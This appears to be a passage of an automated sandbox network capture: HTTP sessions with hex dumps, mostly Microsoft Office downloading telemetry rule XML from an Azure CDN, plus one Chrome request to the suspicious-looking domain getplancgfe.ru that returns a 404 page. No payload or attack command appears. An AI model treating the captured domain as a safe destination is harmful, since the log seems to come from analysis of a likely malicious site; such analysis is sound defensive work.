                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        121192.168.2.44988513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:59 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:59 UTC515INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3342
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                        x-ms-request-id: e5af20bf-e01e-00aa-1a28-2cceda000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124659Z-176bd8f9bc56k8bfhC1DFWtzvn00000000r0000000003hvz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:59 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        122192.168.2.44988613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:59 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:59 UTC515INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2284
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                        x-ms-request-id: 14109ed7-101e-0046-0b2f-2c91b0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124659Z-176bd8f9bc5fvjnbhC1DFW9ez800000000e0000000005syh
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:59 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        123192.168.2.44988713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:59 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:59 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                        x-ms-request-id: 6c1a7137-101e-00a2-6008-2c9f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124659Z-16ccfc49897kh956hC1DFW2afc00000000u00000000008ts
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:59 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        124192.168.2.44988813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:59 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:59 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                        x-ms-request-id: 464d7020-e01e-0020-3508-2cde90000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124659Z-16ccfc49897bnsqjhC1DFWhxb800000000r0000000004z8p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:59 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        125192.168.2.44989013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:00 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:00 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                        x-ms-request-id: a349b1bc-a01e-0021-20bc-2a814c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124700Z-159b85dff8fdh9tvhC1DFW50vs000000033g00000000euzu
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        126192.168.2.44989213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:00 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:00 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                        x-ms-request-id: 97ac533f-101e-00a2-476c-2b9f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124700Z-16dc884887b6v426hC1DFWstvw00000000g0000000006xym
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:00 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        127192.168.2.44989113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:00 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:00 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                        x-ms-request-id: 87c6e830-f01e-003c-7a08-2c8cf0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124700Z-16ccfc498978mvxwhC1DFWafzn00000000rg000000008yb9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:00 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        128192.168.2.449895104.21.8.814435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:00 UTC585OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: getplancgfe.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://getplancgfe.ru//
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:47:00 UTC848INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 12:47:00 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cache-control: private, no-cache, max-age=0
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: BYPASS
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JupzcvkWByyELBQkPBc2UEWqjiiW2bdeN%2FBRjioUeKg%2FyO1%2F%2FgSLOzcXw8Kpev4Pc2qO7uTCEh4OuKk5pZOd2UkzK678tu%2FIMFP%2Fr6dwZKpMetWhfzZH7cZGyMLaCZHtXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfdabd9b72e2a-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1954&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1163&delivery_rate=1442949&cwnd=234&unsent_bytes=0&cid=8734c4f04f6bce89&ts=375&x=0"
                                                                                        2024-11-01 12:47:00 UTC521INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                                        Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                                        2024-11-01 12:47:00 UTC735INData Raw: 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69
                                                                                        Data Ascii: bsolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></di
                                                                                        2024-11-01 12:47:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        129192.168.2.44989313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:00 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:00 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                        ETag: "0x8DC582BE6431446"
                                                                                        x-ms-request-id: 30ba24a5-e01e-0099-6508-2cda8a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124700Z-16ccfc49897kh956hC1DFW2afc00000000t000000000402k
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:00 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        130192.168.2.44989413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:00 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:00 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                        x-ms-request-id: 23cb301e-e01e-0052-6e08-2cd9df000000
                                                                                        x-ms-version: 2018-03-28
